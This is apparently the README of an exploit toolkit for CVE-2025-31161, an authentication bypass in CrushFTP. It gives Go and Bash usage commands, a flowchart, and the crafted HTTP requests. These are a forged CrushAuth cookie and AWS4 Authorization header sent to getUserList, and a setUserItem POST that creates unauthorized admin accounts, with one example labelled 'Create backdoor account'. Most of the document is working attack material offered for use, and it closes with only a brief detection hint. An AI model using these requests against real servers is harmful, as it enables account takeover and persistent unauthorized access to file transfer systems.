
Exploit for CrushFTP CVE-2025-31161 auth bypass: detects vulnerable targets, enumerates users, and creates unauthorized admin accounts through crafted HTTP requests in Go and Bash.
A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.
CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.
-t, -p, -tu flagsCrushFTP-auth-bypass-CVE-2025-31161/
├── README.md # This documentation
├── cve-2025-31161.go # Go implementation (recommended)
├── cve-2025-31161.sh # Bash implementation
└── LICENSE # MIT License
# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
# Requires curl (usually pre-installed)
sudo apt install curl
git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh
# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu
# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu
# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu
# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au
# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au
# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au
# Basic usage
./cve-2025-31161.sh -t example.com -lu
# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu
# Create new user
./cve-2025-31161.sh -t example.com -au
# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au
| Flag | Long Form | Description | Default |
|---|---|---|---|
-t | --target_host | Target hostname or IP (required) | - |
-p | --port | Target port | 80 |
-tu | --target_user | Target user for exploitation | crushadmin |
-lu | --list-users | List existing users | - |
-au | --add-user | Add new user (interactive) | - |
--help | Show help message | - |
# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu
# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123
# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu
# View help
./cve-2025-31161.sh --help
flowchart TD
A[Start Exploit] --> B[Check Target Connectivity]
B --> C{Target Reachable?}
C -->|No| D[Exit: Connection Failed]
C -->|Yes| E[Send getUserList Request]
E --> F{Response Contains OK?}
F -->|No| G[Exit: Not Vulnerable]
F -->|Yes| H[Target is Vulnerable!]
H --> I{Mode Selected?}
I -->|List Users -lu| J[Parse XML Response]
J --> K[Display User List]
K --> L[Exit: Success]
I -->|Add User -au| M[Prompt for Username]
M --> N[Prompt for Password]
N --> O[Send Warm-up Request]
O --> P[Craft User Creation Payload]
P --> Q[Send setUserItem Request]
Q --> R{User Created Successfully?}
R -->|Yes| S[Success: Account Created]
R -->|No| T[Failed: Exploitation Failed]
style A fill:#e1f5fe
style H fill:#c8e6c9
style K fill:#81c784
style S fill:#4caf50
style D fill:#ffcdd2
style G fill:#ffcdd2
style T fill:#ffcdd2
The script first sends a getUserList request to check if the target is vulnerable:
GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
If the response contains <response_status>OK</response_status>, the target is vulnerable.
When using the -lu flag, the script parses the XML response and extracts usernames:
<user_list type="vector">
<user_list_subitem>ben</user_list_subitem>
<user_list_subitem>crushadmin</user_list_subitem>
<user_list_subitem>default</user_list_subitem>
</user_list>
Output:
[+] Users:
- ben
- crushadmin
- default
When using the -au flag, the script sends a setUserItem request with malicious XML payload:
POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded
command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If
The script checks for <response_status>OK</response_status> in the response to confirm successful user creation.
The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.
setUserItem requests in web logs/webinterface/function/ endpoints